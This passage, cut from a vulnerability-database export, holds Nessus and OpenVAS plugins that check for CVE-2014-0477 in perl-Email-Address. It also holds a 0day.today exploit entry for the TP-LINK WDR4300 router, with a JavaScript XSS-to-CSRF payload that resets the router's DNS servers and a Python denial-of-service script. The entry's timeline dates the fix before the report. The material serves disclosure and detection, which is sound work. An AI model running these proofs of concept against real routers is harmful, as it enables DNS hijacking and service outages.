script_id(77946);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:40:32 $\");\n\n script_cve_id(\"CVE-2014-0477\");\n script_bugtraq_id(68084);\n script_xref(name:\"FEDORA\", value:\"2014-7610\");\n\n script_name(english:\"Fedora 19 : perl-Email-Address-1.905-1.fc19 (2014-7610)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.905 to fix CVE-2014-0477.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1110723\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138680.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?38270691\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-Email-Address package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Email-Address\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"perl-Email-Address-1.905-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-Email-Address\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:35:12", "references": ["http://www.nessus.org/u?936f2375", "https://bugzilla.redhat.com/show_bug.cgi?id=1110723"], "pluginID": "77947", "description": "Update to 1.905 to fix CVE-2014-0477.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2014-09-29T00:00:00", "title": "Fedora 20 : perl-Email-Address-1.905-1.fc20 (2014-7613)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0477"], "modified": "2015-10-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:perl-Email-Address", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-7613.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77947", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7613.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77947);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:40:32 $\");\n\n script_cve_id(\"CVE-2014-0477\");\n script_bugtraq_id(68084);\n script_xref(name:\"FEDORA\", value:\"2014-7613\");\n\n script_name(english:\"Fedora 20 : perl-Email-Address-1.905-1.fc20 (2014-7613)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.905 to fix CVE-2014-0477.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1110723\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138688.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?936f2375\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-Email-Address package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Email-Address\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"perl-Email-Address-1.905-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-Email-Address\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-09T07:45:31", "references": [], "edition": 2, "description": "TP-LINK WDR4300 suffers from cross site scripting and denial of service vulnerabilities.", "reporter": "Oz Elisyan", "published": "2014-09-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "zdt", "title": "TP-LINK WDR4300 XSS / Denial Of Service Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4727", "CVE-2014-4720"], "modified": "2014-09-23T00:00:00", "id": "1337DAY-ID-22680", "href": "https://0day.today/exploit/description/22680", "sourceData": "Vendors Contacted: TP-LINK\r\nVendor Patched: Yes, Firmware 140916\r\nSystem Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.\r\nVersions Affected: 130617 , possibly earlier \r\nCVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728\r\n\r\n\r\nVulnerabilities Description\r\n===================\r\n\r\n# Stored XSS -\r\n\r\nIt is possible inject javascript code via DHCP hostname field, \r\nIf the administrator will visit the dhcp clients page (web panel)\r\nthe script will execute.\r\n\r\n# DoS (web server) -\r\nDenial of service condition to the device web server, remotely or locally send the\r\ndevice a \"GET\" request with an extra \"Header\" with a long value (A x 3000 times).\r\n\r\n\r\nProof of Concept:\r\n============\r\n\r\nhttp://elisyan.com/tplink/wdr4300.html\r\n\r\n---- start wdr4300.html ----\r\n/*\r\nAuthor: Oz Elisyan\r\nTitle: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)\r\n*/\r\n\r\n\r\n\r\nvar xmlhttp;\r\nif (window.XMLHttpRequest)\r\n {// code for IE7+, Firefox, Chrome, Opera, Safari\r\n xmlhttp=new XMLHttpRequest();\r\n }\r\nelse\r\n {// code for IE6, IE5\r\n xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n }\r\nxmlhttp.onreadystatechange=function()\r\n {\r\n if (xmlhttp.readyState==4 && xmlhttp.status==200)\r\n {\r\n document.getElementById(\"myDiv\").innerHTML=xmlhttp.responseText;\r\n }\r\n }\r\nxmlhttp.open(\"GET\",\"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save\",true);\r\nxmlhttp.send();\r\n\r\n\r\n\r\n---- end wdr4300.html ----\r\n\r\nhttp://elisyan.com/tplink/wdr4300.py\r\n\r\n---- start wdr4300.py ----\r\n#Author: Oz Elisyan\r\n#TP-Link WDR4300 DoS PoC\r\n\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.0.1\")\r\nheaders = {\"Content-type\": \"application/x-www-form-urlencoded\",\r\n\"Accept\": \"text/plain\", \"DoS\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"}\r\nconn.request(\"GET\",\"/\", \"Let me tell you something\", headers)\r\n\r\nprint \"Done\"\r\n\r\n---- end wdr4300.py ----\r\n\r\n\r\nReport Timeline:\r\n===========\r\n\r\n2014-07-04:\r\nVendor notified about the vulnerabilities with all the relevant technical information.\r\n\r\n2013-09-16:\r\nVendor released a fix.\r\n\r\nCredits:\r\n======\r\n\r\nThe Vulnerabilities was discovered by Oz Elisyan.\r\n\r\n\r\nReferences:\r\n========\r\n\r\nhttp://www.tp-link.com/lk/products/details/?model=TL-WDR4300\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22680"}], "openvas": [{"lastseen": "2018-09-01T23:54:42", "references": ["http://www.debian.org/security/2014/dsa-2969.html"], "pluginID": "1361412562310702969", "description": "Bastian Blank reported a denial of service vulnerability in\nEmail::Address, a Perl module for RFC 2822 address parsing and creation.\nEmail::Address::parse used significant time on parsing empty quoted\nstrings. A remote attacker able to supply specifically crafted input to\nan application using Email::Address for parsing, could use this flaw to\nmount a denial of service attack against the application.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-06-27T00:00:00", "title": "Debian Security Advisory DSA 2969-1 (libemail-address-perl - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0477"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310702969", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702969", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2969.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 2969-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libemail-address-perl on Debian Linux\";\ntag_insight = \"Email::Address implements a complete RFC 2822 parser that locates email\naddresses in strings and returns a list of Email::Address objects\nfound. Alternatively you may construct objects manually. The goal\nof this software is to be correct, and very very fast.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 1.895-1+deb7u1.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.905-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.905-1.\n\nWe recommend that you upgrade your libemail-address-perl packages.\";\ntag_summary = \"Bastian Blank reported a denial of service vulnerability in\nEmail::Address, a Perl module for RFC 2822 address parsing and creation.\nEmail::Address::parse used significant time on parsing empty quoted\nstrings. A remote attacker able to supply specifically crafted input to\nan application using Email::Address for parsing, could use this flaw to\nmount a denial of service attack against the application.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702969\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-0477\");\n script_name(\"Debian Security Advisory DSA 2969-1 (libemail-address-perl - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value:\"2014-06-27 00:00:00 +0200 (Fri, 27 Jun 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2969.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-28T10:49:02", "references": ["http://www.debian.org/security/2014/dsa-2969.html"], "pluginID": "702969", "description": "Bastian Blank reported a denial of service vulnerability in\nEmail::Address, a Perl module for RFC 2822 address parsing and creation.\nEmail::Address::parse used significant time on parsing empty quoted\nstrings. A remote attacker able to supply specifically crafted input to\nan application using Email::Address for parsing, could use this flaw to\nmount a denial of service attack against the application.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-06-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 2969-1 (libemail-address-perl - security update)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0477"], "modified": "2017-07-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702969", "id": "OPENVAS:702969", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2969.nasl 6715 2017-07-13 09:57:40Z teissa $\n# Auto-generated from advisory DSA 2969-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libemail-address-perl on Debian Linux\";\ntag_insight = \"Email::Address implements a complete RFC 2822 parser that locates email\naddresses in strings and returns a list of Email::Address objects\nfound. Alternatively you may construct objects manually. The goal\nof this software is to be correct, and very very fast.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 1.895-1+deb7u1.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.905-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.905-1.\n\nWe recommend that you upgrade your libemail-address-perl packages.\";\ntag_summary = \"Bastian Blank reported a denial of service vulnerability in\nEmail::Address, a Perl module for RFC 2822 address parsing and creation.\nEmail::Address::parse used significant time on parsing empty quoted\nstrings. A remote attacker able to supply specifically crafted input to\nan application using Email::Address for parsing, could use this flaw to\nmount a denial of service attack against the application.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702969);\n script_version(\"$Revision: 6715 $\");\n script_cve_id(\"CVE-2014-0477\");\n script_name(\"Debian Security Advisory DSA 2969-1 (libemail-address-perl - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-13 11:57:40 +0200 (Thu, 13 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-06-27 00:00:00 +0200 (Fri, 27 Jun 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2969.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libemail-address-perl\", ver:\"1.895-1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:21", "references": ["2014-7613", "https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138688.html"], "pluginID": "1361412562310868219", "description": "Check for the Version of perl-Email-Address", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-10-01T00:00:00", "title": "Fedora Update for perl-Email-Address FEDORA-2014-7613", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0477"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310868219", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868219", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-Email-Address 